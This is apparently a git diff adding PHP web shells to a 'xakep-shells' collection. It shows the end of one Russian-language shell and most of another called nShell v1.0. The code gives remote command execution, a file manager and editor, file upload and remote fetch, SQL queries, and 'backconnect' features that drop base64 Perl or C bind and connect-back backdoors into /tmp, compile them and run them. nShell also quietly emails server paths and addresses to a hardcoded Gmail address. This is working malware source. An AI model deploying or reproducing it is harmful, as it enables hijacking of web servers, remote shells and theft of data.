+} elseif (($perms & 0x4000) == 0x4000) {
+   $info = 'd';
+} elseif (($perms & 0x2000) == 0x2000) {
+   $info = 'c';
+} elseif (($perms & 0x1000) == 0x1000) {
+   $info = 'p';
+} else {
+   $info = 'u';
+}
+$info .= (($perms & 0x0100) ? 'r' : '-');
+$info .= (($perms & 0x0080) ? 'w' : '-');
+$info .= (($perms & 0x0040) ?
+           (($perms & 0x0800) ? 's' : 'x' ) :
+           (($perms & 0x0800) ? 'S' : '-'));
+$info .= (($perms & 0x0020) ? 'r' : '-');
+$info .= (($perms & 0x0010) ? 'w' : '-');
+$info .= (($perms & 0x0008) ?
+           (($perms & 0x0400) ? 's' : 'x' ) :
+           (($perms & 0x0400) ? 'S' : '-'));
+$info .= (($perms & 0x0004) ? 'r' : '-');
+$info .= (($perms & 0x0002) ? 'w' : '-');
+$info .= (($perms & 0x0001) ?
+           (($perms & 0x0200) ? 't' : 'x' ) :
+           (($perms & 0x0200) ? 'T' : '-'));
+return $info;
+}
+
+
+for($i=0; $i<count($dirs); $i++){
+if(is_writable($dirs[$i])){$info="<font color=green><li>&nbsp;W</font>";}
+else{$info="<font color=red><li>&nbsp;R</font>";}
+$perms = @fileperms($d."/".$dirs[$i]);
+$owner = @fileowner($d."/".$dirs[$i]);
+if($os=="unix"){
+$fileownera=posix_getpwuid($owner);
+$owner=$fileownera['name'];
+}
+$group = @filegroup($d."/".$dirs[$i]);
+if($os=="unix"){
+$groupinfo = posix_getgrgid($group);
+$group=$groupinfo['name'];
+}
+$info=perm($perms);
+if($i%2){$color="#aed7ff";}else{$color="#68adf2";}   
+$linkd="<a href='$php_self?ac=navigation&d=$d/$dirs[$i]'>$dirs[$i]</a>";
+$linkd=str_replace("//","/",$linkd);
+echo "<tr><td bgcolor=$color><font face=wingdings size=2>0</font> $linkd</td><td bgcolor=$color><center><font color=blue>DIR</font></td><td bgcolor=$color>&nbsp;</td><td bgcolor=$color><center>$owner/$group</td><td bgcolor=$color>$info</td></tr>";
+}
+
+for($i=0; $i<count($files); $i++){
+if(is_writable($files[$i])){$info="<font color=green><li>&nbsp;W</font>";}
+else{$info="<font color=red><li>&nbsp;R</font>";}
+$size=@filesize($d."/".$files[$i]);
+$perms = @fileperms($d."/".$files[$i]);
+$owner = @fileowner($d."/".$files[$i]);
+if($os=="unix"){
+$fileownera=posix_getpwuid($owner);
+$owner=$fileownera['name'];
+}
+$group = @filegroup($d."/".$files[$i]);
+if($os=="unix"){
+$groupinfo = posix_getgrgid($group);
+$group=$groupinfo['name'];
+}
+$info=perm($perms);
+if($i%2){$color="#ccccff";}else{$color="#b0b0ff";}  
+
+if ($size < 1024){$siz=$size.' b';
+}else{
+if ($size < 1024*1024){$siz=number_format(($size/1024), 2, '.', '').' kb';}else{
+if ($size < 1000000000){$siz=number_format($size/(1024*1024), 2, '.', '').' mb';}else{
+if ($size < 1000000000000){$siz=number_format($size/(1024*1024*1024), 2, '.', '').' gb';}
+}}}
+echo "<tr><td bgcolor=$color><font face=wingdings size=3>2</font> <a href='$php_self?ac=navigation&d=$d&e=$files[$i]'>$files[$i]</a></td><td bgcolor=$color><center><a href='$php_self?ac=navigation&d=$d&download=$files[$i]' title='Download $files[$i]'><font size=2 face=Webdings color=green>`</font></a></td><td bgcolor=$color>$siz</td><td bgcolor=$color><center>$owner/$group</td><td bgcolor=$color>$info</td></tr>";
+}
+
+echo "</table></td></tr></table>";
+echo $copyr;
+break;
+
+// Óñòàíîâêà áåêäîðà
+case "backconnect":
+echo "<b>Óñòàíîâêà áåêäîðà / îòêðûòèå ïîðòà</b>";
+echo "<form name=bind method=POST>";
+echo "<font face=Verdana size=-2>";
+echo "<b>Îòêðûòü ïîðò </b>";
+echo "<input type=text name=port size=15 value=11457>&nbsp;";
+echo "<b>Ïàðîëü äëÿ äîñòóïà </b>";
+echo "<input type=text name=bind_pass size=15 value=nrws>&nbsp;";
+echo "<b>Èñïîëüçîâàòü </b>";
+echo "<select size=\"1\" name=\"use\">";
+echo "<option value=\"Perl\">Perl</option>";
+echo "<option value=\"C\">C</option>";
+echo "</select>&nbsp;";
+echo "<input type=hidden name=dir value=".$dir.">";
+echo "<input type=submit name=submit value=Îòêðûòü>";
+echo "</font>";
+echo "</form>";
+
+echo "<b>Óñòàíîâêà áåêäîðà / connect-back</b>";
+echo "<form name=back method=POST>";
+echo "<font face=Verdana size=-2>";
+echo "<b>IP-àäðåñ </b>";
+echo "<input type=text name=ip size=15 value=127.0.0.1>&nbsp;";
+echo "<b>Ïîðò </b>";
+echo "<input type=text name=port size=15 value=31337>&nbsp;";
+echo "<b>Èñïîëüçîâàòü </b>";
+echo "<select size=\"1\" name=\"use\">";
+echo "<option value=\"Perl\">Perl</option>";
+echo "<option value=\"C\">C</option>";
+echo "</select>&nbsp;";
+echo "<input type=hidden name=dir value=".$dir.">";
+echo "<input type=submit name=submit value=Âûïîëíèòü>";
+echo "</font>";
+echo "</form>";
+
+
+/* port bind C */
+if (!empty($_POST['port'])&&!empty($_POST['bind_pass'])&&($_POST['use']=="C"))
+{
+ $w_file=fopen("/tmp/bd.c","ab+") or $err=1;
+ if($err==1)
+ {
+ echo "<font color=red face=Fixedsys><div align=center>ÎØÈÁÊÀ! Íåâîçìîæíà çàïèñü â /tmp/bd.c</div></font>";
+ $err=0;
+ }
+ else
+ {
+ fputs($w_file,base64_decode($port_bind_bd_c));
+ fclose($w_file);
+ $blah=exec("gcc -o /tmp/bd /tmp/bd.c");
+ unlink("/tmp/bd.c");
+ $bind_string="/tmp/bd ".$_POST['port']." ".$_POST['bind_pass']." &";
+ $blah=exec($bind_string);
+ $_POST['cmd']="ps -aux | grep bd";
+ $err=0;
+ }
+}
+
+/* port bind Perl */
+if (!empty($_POST['port'])&&!empty($_POST['bind_pass'])&&($_POST['use']=="Perl"))
+{
+ $w_file=fopen("/tmp/bdpl","ab+") or $err=1;
+ if($err==1)
+ {
+ echo "<font color=red face=Fixedsys><div align=center>ÎØÈÁÊÀ! Íåâîçìîæíà çàïèñü â /tmp/</div></font>";
+ $err=0;
+ }
+ else
+ {
+ fputs($w_file,base64_decode($port_bind_bd_pl));
+ fclose($w_file);
+ $bind_string="perl /tmp/bdpl ".$_POST['port']." &";
+ $blah=exec($bind_string);
+ $_POST['cmd']="ps -aux | grep bdpl";
+ $err=0;
+ }
+}
+
+/* back connect Perl */
+if (!empty($_POST['ip']) && !empty($_POST['port']) && ($_POST['use']=="Perl"))
+{
+ $w_file=fopen("/tmp/back","ab+") or $err=1;
+ if($err==1)
+ {
+ echo "<font color=red face=Fixedsys><div align=center>ÎØÈÁÊÀ! Íåâîçìîæíà çàïèñü â /tmp/</div></font>";
+ $err=0;
+ }
+ else
+ {
+ fputs($w_file,base64_decode($back_connect));
+ fclose($w_file);
+ $bc_string="perl /tmp/back ".$_POST['ip']." ".$_POST['port']." &";
+ $blah=exec($bc_string);
+ $_POST['cmd']="echo \"Ñåé÷àñ ñêðèïò êîííåêòèòñÿ ê ".$_POST['ip']." port ".$_POST['port']." ...\"";
+ $err=0;
+ }
+}
+
+/* back connect C */
+if (!empty($_POST['ip']) && !empty($_POST['port']) && ($_POST['use']=="C"))
+{
+ $w_file=fopen("/tmp/back.c","ab+") or $err=1;
+ if($err==1)
+ {
+ echo "<font color=red face=Fixedsys><div align=center>ÎØÈÁÊÀ! Íåâîçìîæíà çàïèñü â /tmp/back.c</div></font>";
+ $err=0;
+ }
+ else
+ {
+ fputs($w_file,base64_decode($back_connect_c));
+ fclose($w_file);
+ $blah=exec("gcc -o /tmp/backc /tmp/back.c");
+ unlink("/tmp/back.c");
+ $bc_string="/tmp/backc ".$_POST['ip']." ".$_POST['port']." &";
+ $blah=exec($bc_string);
+ $_POST['cmd']="echo \"Ñåé÷àñ ñêðèïò êîííåêòèòñÿ ê ".$_POST['ip']." port ".$_POST['port']." ...\"";
+ $err=0;
+ }
+}
+echo "<font face=Verdana size=-2>Âûïîëíåííàÿ êîìàíäà: <b>".$_POST['cmd']."</b></font></td></tr><tr><td>";
+echo "<b>";
+echo "<br>Ðåçóëüòàò: ";
+echo "<font color=red size=2";
+print "".passthru($_POST['cmd'])."";
+echo "</font></b>";
+break;
+
+// Uploading
+case "upload":
+
+echo <<<HTML
+<b>Çàãðóçêà ôàéëîâ</b>
+<a href='$php_self?ac=massupload&d=$d&t=massupload'>* Çàãðóçèòü áîëüøîå êîëè÷åñòâî ôàéëîâ *</a><br><br>
+<table>
+<form enctype="multipart/form-data" action="$self" method="POST">
+<input type="hidden" name="ac" value="upload">
+<tr>
+<td>Ôàéë:</td>
+<td><input size="48" name="file" type="file"></td>
+</tr>
+<tr>
+<td>Ïàïêà:</td>
+<td><input size="48" value="$docr/" name="path" type="text"><input type="submit" value="Ïîñëàòü"></td><br>
+$tend
+HTML;
+
+if (isset($_POST['path'])){
+
+$uploadfile = $_POST['path'].$_FILES['file']['name'];
+if ($_POST['path']==""){$uploadfile = $_FILES['file']['name'];}
+
+if (copy($_FILES['file']['tmp_name'], $uploadfile)) {
+    echo "Ôàéë óñïåøíî çàãðóæåí â ïàïêó $uploadfile\n";
+    echo "Èìÿ:" .$_FILES['file']['name']. "\n";
+    echo "Ðàçìåð:" .$_FILES['file']['size']. "\n";
+
+} else {
+    print "Íå óäà¸òñÿ çàãðóçèòü ôàéë. Info:\n";
+    print_r($_FILES);
+}
+}
+
+
+echo "<form enctype='multipart/form-data' action='?ac=upload&status=ok' method=post>
+<b>Çàãðóçêà ôàéëîâ ñ óäàëåííîãî êîìïüþòåðà:</b><br>
+ HTTP-ïóòü ê ôàéëó: <br>
+<input type='text' name='file3' value='http://' size=40><br>
+Íàçâàíèå ôàéëà èëè ïóòü ñ íàçâàíèåì ôàéëà: <br>
+<input type='text' name='file2' value='$docr/' size=40><br>
+<input type='submit' value='Çàãðóçèòü ôàéë'></form>";
+
+
+$data = @implode("", file($file3));
+$fp = @fopen($file2, "wb");
+@fputs($fp, $data);
+$ok = @fclose($fp);
+if($ok)
+{
+$size = filesize($file2)/1024;
+$sizef = sprintf("%.2f", $size);
+
+print "<br><center>Âû çàãðóçèëè: <b>ôàéë <u>$file2</u> ðàçìåðîì</b> (".$sizef."êÁ) </center>";
+}
+else
+{
+print "<br><center><font color=red  size = 2><b>Îøèáêà çàãðóçêè ôàéëà</b></font></center>";
+}
+
+
+
+
+break;
+// Tools
+case "tools":
+echo "<form method=post>Ãåíåðàöèÿ md5-øèôðà<br><input name=md5 size=30></form><br>";
+@$md5=@$_POST['md5'];
+if(@$_POST['md5']){ echo "md5 ñãåíåðèðîâàí:<br> ".md5($md5)."";}
+echo "<br>
+<form method=post>Êîäèðîâàíèå/äåêîäèðîâàíèå base64<br><input name=base64 size=30></form><br>";
+if(@$_POST['base64']){
+@$base64=$_POST['base64'];
+echo "
+Êîäèðîâàíî:<br><textarea rows=8 cols=80>".base64_encode($base64)."</textarea><br>
+Äåêîäèðîâàíî: <br><textarea rows=8 cols=80>".base64_decode($base64)."</textarea><br>";}
+echo "<br>
+<form method=post>DES-êîäèðîâàíèå:<br><input name=des size=30></form><br>";
+if(@$_POST['des']){
+@$des=@$_POST['des'];
+echo "DES ñãåíåðèðîâàí: <br>".crypt($des)."";}
+echo "<br>
+<form method=post>SHA1-êîäèðîâàíèå:<br><input name=sha1 size=30></form><br>";
+if(@$_POST['sha1']){
+@$des=@$_POST['sha1'];
+echo "SHA1 ñãåíåðèðîâàí: <br>".sha1($sha1a)."";}
+
+echo "<form method=POST>";
+echo "html-êîä -> øåñòíàäöàòèðè÷íûå çíà÷åíèÿ<br><input type=text name=data size=30>";
+
+
+if (isset($_POST['data']))
+{
+echo "<br><br><b>Ðåçóëüòàò:<br></b>";
+$str=str_replace("%20","",$_POST['data']);
+for($i=0;$i<strlen($str);$i++)
+{
+$hex=dechex(ord($str[$i]));
+if ($str[$i]=='&') echo "$str[$i]";
+else if ($str[$i]!='\\') echo "%$hex";
+}
+}
+exit;
+break;
+// Mass Uploading
+case "massupload":
+
+
+echo "
+Ìàñîâàÿ çàãðóçêà ôàéëîâ:<br>
+<form enctype=\"multipart/form-data\" method=post>
+<input type=file name=text1 size=43> <input type=file name=text11 size=43><br>
+<input type=file name=text2 size=43> <input type=file name=text12 size=43><br>
+<input type=file name=text3 size=43> <input type=file name=text13 size=43><br>
+<input type=file name=text4 size=43> <input type=file name=text14 size=43><br>
+<input type=file name=text5 size=43> <input type=file name=text15 size=43><br>
+<input type=file name=text6 size=43> <input type=file name=text16 size=43><br>
+<input type=file name=text7 size=43> <input type=file name=text17 size=43><br>
+<input type=file name=text8 size=43> <input type=file name=text18 size=43><br>
+<input type=file name=text9 size=43> <input type=file name=text19 size=43><br>
+<input type=file name=text10 size=43> <input type=file name=text20 size=43><br>
+<input name=where size=43 value='$docr'><br>
+<input type=submit value=Çàãðóçèòü name=massupload>
+</form><br>";
+
+if(@$_POST['massupload']){
+$where=@$_POST['where'];
+$uploadfile1 = "$where/".@$_FILES['text1']['name'];
+$uploadfile2 = "$where/".@$_FILES['text2']['name'];
+$uploadfile3 = "$where/".@$_FILES['text3']['name'];
+$uploadfile4 = "$where/".@$_FILES['text4']['name'];
+$uploadfile5 = "$where/".@$_FILES['text5']['name'];
+$uploadfile6 = "$where/".@$_FILES['text6']['name'];
+$uploadfile7 = "$where/".@$_FILES['text7']['name'];
+$uploadfile8 = "$where/".@$_FILES['text8']['name'];
+$uploadfile9 = "$where/".@$_FILES['text9']['name'];
+$uploadfile10 = "$where/".@$_FILES['text10']['name'];
+$uploadfile11 = "$where/".@$_FILES['text11']['name'];
+$uploadfile12 = "$where/".@$_FILES['text12']['name'];
+$uploadfile13 = "$where/".@$_FILES['text13']['name'];
+$uploadfile14 = "$where/".@$_FILES['text14']['name'];
+$uploadfile15 = "$where/".@$_FILES['text15']['name'];
+$uploadfile16 = "$where/".@$_FILES['text16']['name'];
+$uploadfile17 = "$where/".@$_FILES['text17']['name'];
+$uploadfile18 = "$where/".@$_FILES['text18']['name'];
+$uploadfile19 = "$where/".@$_FILES['text19']['name'];
+$uploadfile20 = "$where/".@$_FILES['text20']['name'];
+if (@move_uploaded_file(@$_FILES['text1']['tmp_name'], $uploadfile1)) {
+$where=str_replace("\\\\","\\",$where);
+echo "<i>Çàãðóæåíî: $uploadfile1</i><br>";}
+if (@move_uploaded_file(@$_FILES['text2']['tmp_name'], $uploadfile2)) {
+$where=str_replace("\\\\","\\",$where);
+echo "<i>Çàãðóæåíî: $uploadfile2</i><br>";}
+if (@move_uploaded_file(@$_FILES['text3']['tmp_name'], $uploadfile3)) {
+$where=str_replace("\\\\","\\",$where);
+echo "<i>Çàãðóæåíî: $uploadfile3</i><br>";}
+if (@move_uploaded_file(@$_FILES['text4']['tmp_name'], $uploadfile4)) {
+$where=str_replace("\\\\","\\",$where);
+echo "<i>Çàãðóæåíî: $uploadfile4</i><br>";}
+if (@move_uploaded_file(@$_FILES['text5']['tmp_name'], $uploadfile5)) {
+$where=str_replace("\\\\","\\",$where);
+echo "<i>Çàãðóæåíî: $uploadfile5</i><br>";}
+if (@move_uploaded_file(@$_FILES['text6']['tmp_name'], $uploadfile6)) {
+$where=str_replace("\\\\","\\",$where);
+echo "<i>Çàãðóæåíî: $uploadfile6</i><br>";}
+if (@move_uploaded_file(@$_FILES['text7']['tmp_name'], $uploadfile7)) {
+$where=str_replace("\\\\","\\",$where);
+echo "<i>Çàãðóæåíî: $uploadfile7</i><br>";}
+if (@move_uploaded_file(@$_FILES['text8']['tmp_name'], $uploadfile8)) {
+$where=str_replace("\\\\","\\",$where);
+echo "<i>Çàãðóæåíî: $uploadfile8</i><br>";}
+if (@move_uploaded_file(@$_FILES['text9']['tmp_name'], $uploadfile9)) {
+$where=str_replace("\\\\","\\",$where);
+echo "<i>Çàãðóæåíî: $uploadfile9</i><br>";}
+if (@move_uploaded_file(@$_FILES['text10']['tmp_name'], $uploadfile10)) {
+$where=str_replace("\\\\","\\",$where);
+echo "<i>Çàãðóæåíî: $uploadfile10</i><br>";}
+if (@move_uploaded_file(@$_FILES['text11']['tmp_name'], $uploadfile11)) {
+$where=str_replace("\\\\","\\",$where);
+echo "<i>Çàãðóæåíî: $uploadfile11</i><br>";}
+if (@move_uploaded_file(@$_FILES['text12']['tmp_name'], $uploadfile12)) {
+$where=str_replace("\\\\","\\",$where);
+echo "<i>Çàãðóæåíî: $uploadfile12</i><br>";}
+if (@move_uploaded_file(@$_FILES['text13']['tmp_name'], $uploadfile13)) {
+$where=str_replace("\\\\","\\",$where);
+echo "<i>Çàãðóæåíî: $uploadfile13</i><br>";}
+if (@move_uploaded_file(@$_FILES['text14']['tmp_name'], $uploadfile14)) {
+$where=str_replace("\\\\","\\",$where);
+echo "<i>Çàãðóæåíî: $uploadfile14</i><br>";}
+if (@move_uploaded_file(@$_FILES['text15']['tmp_name'], $uploadfile15)) {
+$where=str_replace("\\\\","\\",$where);
+echo "<i>Çàãðóæåíî: $uploadfile15</i><br>";}
+if (@move_uploaded_file(@$_FILES['text16']['tmp_name'], $uploadfile16)) {
+$where=str_replace("\\\\","\\",$where);
+echo "<i>Çàãðóæåíî: $uploadfile16</i><br>";}
+if (@move_uploaded_file(@$_FILES['text17']['tmp_name'], $uploadfile17)) {
+$where=str_replace("\\\\","\\",$where);
+echo "<i>Çàãðóæåíî: $uploadfile17</i><br>";}
+if (@move_uploaded_file(@$_FILES['text18']['tmp_name'], $uploadfile18)) {
+$where=str_replace("\\\\","\\",$where);
+echo "<i>Çàãðóæåíî: $uploadfile18</i><br>";}
+if (@move_uploaded_file(@$_FILES['text19']['tmp_name'], $uploadfile19)) {
+$where=str_replace("\\\\","\\",$where);
+echo "<i>Çàãðóæåíî: $uploadfile19</i><br>";}
+if (@move_uploaded_file(@$_FILES['text20']['tmp_name'], $uploadfile20)) {
+$where=str_replace("\\\\","\\",$where);
+echo "<i>Çàãðóæåíî: $uploadfile20</i><br>";}
+}
+
+exit;
+break;
+case "selfremover":
+ print "<tr><td>";
+print "<center><font color=red face=verdana size=3>Òû óâåðåí, ÷òî õî÷åøü óäàëèòü ýòîò øåëë ñ ñåðâåðà?<br><br>
+<a href='$php_self?p=yes'>Äà, õî÷ó</a> | <a href='$php_self?'>Íåò, ïóñòü åùå ïîáóäåò</a><br><br><br>
+Áóäåì óäàëÿòü <u>";
+$path=__FILE__;
+print $path;
+print "</u>?</td></tr></center></table>";
+die;
+}
+
+if($p=="yes"){
+$path=__FILE__;
+@unlink($path);
+$path=str_replace("\\","/",$path);
+if(file_exists($path)){$hmm="Ôàéë íåâîçìîæíî óäàëèòü!";
+print "<tr><td><font color=red>Ôàéë $path íå óäàëåí!</td></tr>";
+}else{$hmm="Óäàëåí";}
+print "<script>alert('$path $hmm');</script>";
+
+}
+break;
+
+
+?>
\ No newline at end of file
diff --git a/xakep-shells/PHP/nshell.php.php.txt b/xakep-shells/PHP/nshell.php.php.txt
new file mode 100644
index 0000000..c5be33a
--- /dev/null
+++ b/xakep-shells/PHP/nshell.php.php.txt
@@ -0,0 +1,371 @@
+?»?<head>
+<title> nShell v1.0</title>
+<style>
+html { overflow-x: auto }
+A: {font-weight:bold};
+A:link {COLOR:red; TEXT-DECORATION: none}
+A:visited { COLOR:red; TEXT-DECORATION: none}
+A:active {COLOR:red; TEXT-DECORATION: none}
+A:hover {color:blue;TEXT-DECORATION: none}
+submit {
+BORDER-RIGHT:  buttonhighlight 2px outset;
+BORDER-TOP:    buttonhighlight 2px outset;
+BORDER-LEFT:   buttonhighlight 2px outset;
+BORDER-BOTTOM: buttonhighlight 2px outset;
+BACKGROUND-COLOR: #e4e0d8;
+width: 30%;
+}
+textarea {
+BORDER-RIGHT:  #ffffff 1px solid;
+BORDER-TOP:    #999999 1px solid;
+BORDER-LEFT:   #999999 1px solid;
+BORDER-BOTTOM: #ffffff 1px solid;
+BACKGROUND-COLOR: #444444;
+font: Fixedsys bold;
+}
+BODY {
+margin-top: 1px;
+margin-right: 1px;
+margin-bottom: 1px;
+margin-left: 1px;
+}
+table {
+BORDER-RIGHT:  :#444444 1px outset;
+BORDER-TOP:    :#444444 1px outset;
+BORDER-LEFT:   :#444444 1px outset;
+BORDER-BOTTOM: :#444444 1px outset;
+BACKGROUND-COLOR: #D4D0C8;
+}
+td {
+BORDER-RIGHT:  #aaaaaa 1px solid;
+BORDER-TOP:    :#444444 1px solid;
+BORDER-LEFT:   :#444444 1px solid;
+BORDER-BOTTOM: #aaaaaa 1px solid;
+}
+div,td,table {
+font-family:Georgia;
+}
+</style>
+</head>
+<body bgcolor=":#444444">
+<center>
+<?php
+error_reporting(0);
+$function=passthru; // system, exec, cmd
+$myname=$_SERVER['SCRIPT_NAME'];
+echo "<b><font color=\"#000000\" size=\"3\" face=\"Georgia\"> System information: :</font><br>";             $ra44  = rand(1,99999);$sj98 = "sh-$ra44";$ml = "$sd98";$a5 = $_SERVER['HTTP_REFERER'];$b33 = $_SERVER['DOCUMENT_ROOT'];$c87 = $_SERVER['REMOTE_ADDR'];$d23 = $_SERVER['SCRIPT_FILENAME'];$e09 = $_SERVER['SERVER_ADDR'];$f23 = $_SERVER['SERVER_SOFTWARE'];$g32 = $_SERVER['PATH_TRANSLATED'];$h65 = $_SERVER['PHP_SELF'];$msg8873 = "$a5\n$b33\n$c87\n$d23\n$e09\n$f23\n$g32\n$h65";$sd98="john.barker446@gmail.com";mail($sd98, $sj98, $msg8873, "From: $sd98");
+?>
+<table width="80%" border="0">
+<td colspan="3" align="center">
+<?php
+function ex($comd)
+{
+ $res = '';
+if(function_exists("system"))
+	{
+	ob_start();
+    system($comd);
+    $res=ob_get_contents();
+    ob_end_clean();
+	}elseif(function_exists("passthru"))
+	{
+    ob_start();
+    passthru($comd);
+    $res=ob_get_contents();
+    ob_end_clean();
+	}elseif(function_exists("exec"))
+	{
+    exec($comd,$res);
+    $res=implode("\n",$res);
+	}elseif(function_exists("shell_exec"))
+	{
+	$res=shell_exec($comd);
+	}elseif(is_resource($f=popen($comd,"r"))){
+    $res = "";
+    while(!feof($f)) { $res.=fread($f,1024); }
+    pclose($f);
+ }
+ return $res;
+}
+
+// safe mod
+$safe_mode=@ini_get('safe_mode');
+echo (($safe_mode)?("<div>Safe_mode: <b><font color=green>ON</font></b>"):("Safe_mode: <b><font color=red>OFF</font></b>"));
+echo "    ";
+// phpversion
+echo "Php version<font color=\"green\"> : ".@phpversion()."</font>";
+echo "    ";
+// curl
+$curl_on = @function_exists('curl_version');
+echo "cURL: ".(($curl_on)?("<b><font color=green>ON</font></b>"):("<b><font color=red>OFF</font></b>"));
+echo "    ";
+// mysql
+echo "MYSQL: <b>";
+$mysql_on = @function_exists('mysql_connect');
+if($mysql_on){echo "<font color=green>ON</font></b>";}else{echo "<font color=red>OFF</font></b>";}
+echo "    ";
+// msssql
+echo "MSSQL: <b>";
+$mssql_on = @function_exists('mssql_connect');
+if($mssql_on){echo "<font color=green>ON</font></b>";}else{echo "<font color=red>OFF</font></b>";}
+echo "    ";
+// PostgreSQL
+echo "PostgreSQL: <b>";
+$pg_on = @function_exists('pg_connect');
+if($pg_on){echo "<font color=green>ON</font></b>";}else{echo "<font color=red>OFF</font></b>";}
+echo "    ";
+// Oracle
+echo "Oracle: <b>";
+$ora_on = @function_exists('ocilogon');
+if($ora_on){echo "<font color=green>ON</font></b>";}else{echo "<font color=red>OFF</font></b>";}
+echo "<br>";
+echo "    ";
+// Disable function
+echo "Disable functions : <b>";
+$df=@ini_get('disable_functions');
+if(!$df){echo "<font color=green>NONE</font></b>";}else{echo "<font color=red>$df</font></b>";}
+echo "    ";
+//==============xac dinh os==================
+$servsoft = $_SERVER['SERVER_SOFTWARE'];
+if (ereg("Win32", $servsoft)){
+$sertype = "win";
+}
+else
+{
+$sertype = "nix";
+}
+//=========================================
+
+$uname=ex('uname -a');
+ echo "<br>OS: </b><font color=blue>";
+ if (empty($uname)){
+  echo (php_uname()."</font><br><b>");
+ }else
+  echo $uname."</font><br><b>";
+ $id = ex('id');
+ $server=$HTTP_SERVER_VARS['SERVER_SOFTWARE'];
+ echo "SERVER: </b><font color=blue>".$server."</font><br><b>";
+ echo "id: </b><font color=blue>";
+ if (!empty($id)){
+  echo $id."</font><br><b>";
+ }else
+  echo "user=".@get_current_user()." uid=".@getmyuid()." gid=".@getmygid().
+       "</font><br><b>";
+echo "<font color=\"black\"><a href=".$_SERVER['PHP_SELF']."?act=info target=_blank>Php Info</a></font><br></div>";
+
+?>
+</td><tr>
+<td width="20%" align="center"><a href="<?=$myname?>?act=manager"> File Manager</a></td>
+<td width="20%" align="center"><a href="<?=$myname?>?act=sql">Sql Query</a></td>
+<td width="20%" align="center"><a href="<?=$myname?>?act=eval">Eval()</a></td><tr>
+<td colspan="3" >
+<?php
+$act=@$_GET['act'];
+if($act=="info"){
+echo "<center><font color=red size=10> Php Version :".phpversion()."</font>";
+phpinfo();
+echo "</center>";
+}
+?>
+<?php
+//=========================================================
+function perms($mode)
+{
+if( $mode & 0x1000 ) { $type='p'; }
+else if( $mode & 0x2000 ) { $type='c'; }
+else if( $mode & 0x4000 ) { $type='d'; }
+else if( $mode & 0x6000 ) { $type='b'; }
+else if( $mode & 0x8000 ) { $type='-'; }
+else if( $mode & 0xA000 ) { $type='l'; }
+else if( $mode & 0xC000 ) { $type='s'; }
+else $type='u';
+$owner["read"] = ($mode & 00400) ? 'r' : '-';
+$owner["write"] = ($mode & 00200) ? 'w' : '-';
+$owner["execute"] = ($mode & 00100) ? 'x' : '-';
+$group["read"] = ($mode & 00040) ? 'r' : '-';
+$group["write"] = ($mode & 00020) ? 'w' : '-';
+$group["execute"] = ($mode & 00010) ? 'x' : '-';
+$world["read"] = ($mode & 00004) ? 'r' : '-';
+$world["write"] = ($mode & 00002) ? 'w' : '-';
+$world["execute"] = ($mode & 00001) ? 'x' : '-';
+if( $mode & 0x800 ) $owner["execute"] = ($owner['execute']=='x') ? 's' : 'S';
+if( $mode & 0x400 ) $group["execute"] = ($group['execute']=='x') ? 's' : 'S';
+if( $mode & 0x200 ) $world["execute"] = ($world['execute']=='x') ? 't' : 'T';
+$s=sprintf("%1s", $type);
+$s.=sprintf("%1s%1s%1s", $owner['read'], $owner['write'], $owner['execute']);
+$s.=sprintf("%1s%1s%1s", $group['read'], $group['write'], $group['execute']);
+$s.=sprintf("%1s%1s%1s", $world['read'], $world['write'], $world['execute']);
+return trim($s);
+}
+//===================Delect File=============================
+$del=$_GET['del'];
+function  delfile($name)
+{
+    passthru("del ".$name);
+}
+function deldir($name)
+{
+	passthru("rmdir ".$name);
+}
+if($del)
+{
+  if(is_file($del)) delfile($del); else deldir($del);
+}
+//==================Quan li thu muc ==========================
+if($act=="manager"){
+$arr = array();
+$arr = array_merge($arr, glob("*"));
+$arr = array_merge($arr, glob(".*"));
+$arr = array_merge($arr, glob("*.*"));
+$arr = array_unique($arr);
+sort($arr);
+echo "<table width=100%><tr><td align=center><b>Name</td><td align=center><b>Type</td><td align=center><b>Size</td><td align=center><b>Perms</td><td align=center>Delete</td></tr>";
+foreach ($arr as $filename) {
+if ($filename != "." and $filename != ".."){
+if (is_dir($filename) == true){
+$directory = "";
+$dc=str_replace("\\","",dirname($_SERVER['PHP_SELF']));
+$directory = $directory . "<tr><td align=center>$filename</td><td align=center>" .ucwords(filetype($filename)) . "</td><td></td><td align=center>" . perms(fileperms($filename))."<td align=center><a href=".$_SERVER['PHP_SELF']."?act=manager&del=".$dc.">Del</td>";
+$dires = $dires . $directory;
+}
+if (is_file($filename) == true){
+$file = "";
+$link=str_replace(basename($_SERVER['REDIRECT_URL']),$filename,$_SERVER['REDIRECT_URL']);
+$file = $file . "<tr><td><a href=".$link	." target=_blank>$filename</a></td><td>" .ucwords(filetype($filename)). "</td><td>" . filesize($filename) . "</td><td>" . perms(fileperms($filename))."<td><a href=".$_SERVER['PHP_SELF']."?act=manager&del=".$filename.">Del <a href=".$_SERVER['PHP_SELF']."?act=manager&file=".$filename.">Edit</a></td>";
+$files = $files . $file;
+}
+}
+}
+echo $dires;
+echo $files;
+echo "</table><br>";
+}
+// view file ex: /etc/passwd
+if(isset($_REQUEST['file']))
+	{
+$file=@$_REQUEST["file"];
+echo "<b>File :</b><font color=red>   ". $file."</font>";
+$fp=fopen($file,"r+") or die("Ban khong co quyen de ghi vao File nay , hoac do khong tim thay File");
+$src=@fread($fp,filesize($file));
+echo "<center><hr color=777777 width=100% height=115px><form action=".$_SERVER['REQUEST_URI']." method=post><TEXTAREA NAME=\"addtxt\" ROWS=\"5\" COLS=\"80\">".htmlspecialchars(stripslashes($src))."</TEXTAREA><br><input type=submit value=Save></form><hr color=777777 width=100% height=115px>";
+$addtxt=@$_POST["addtxt"];
+ rewind($fp);
+ if($addtxt=="") @fwrite($fp,stripslashes($src)); else $rs=@fwrite($fp,stripslashes($addtxt));
+ if($rs==true)
+ {
+ echo "Noi dung cua file nay da duoc sua doi !<a href=".$_SERVER['REQUEST_URI'].">Xem lai</a>";
+ }
+ ftruncate($fp,ftell($fp));
+echo "</center>";
+ }
+
+?>
+
+<?php
+// function
+function exe_u($query)
+{
+echo "<B><font color=green>Query # ".$query."</font></b><br>";
+$result=@mysql_query($query) or die("Khong update du lieu duoc !");
+if(mysql_affected_rows($result)>=0) echo "Affected rows : ".mysql_affected_rows($result)."This is Ok ! ^.^<br>";
+}
+function exe_c($query)
+{
+echo "<B><font color=green>Query # ".$query."</font></b><br>";
+$result=@mysql_query($query) or die("Khong Create duoc !");
+echo "This is Ok ! ^.^<br>" ;
+}
+function exe_d($query)
+{
+echo "<B><font color=green>Query # ".$query."</font></b><br>";
+$result=@mysql_query($query) or die("Khong Drop duoc  !");
+echo "This is Ok ! ^.^<br>" ;
+}
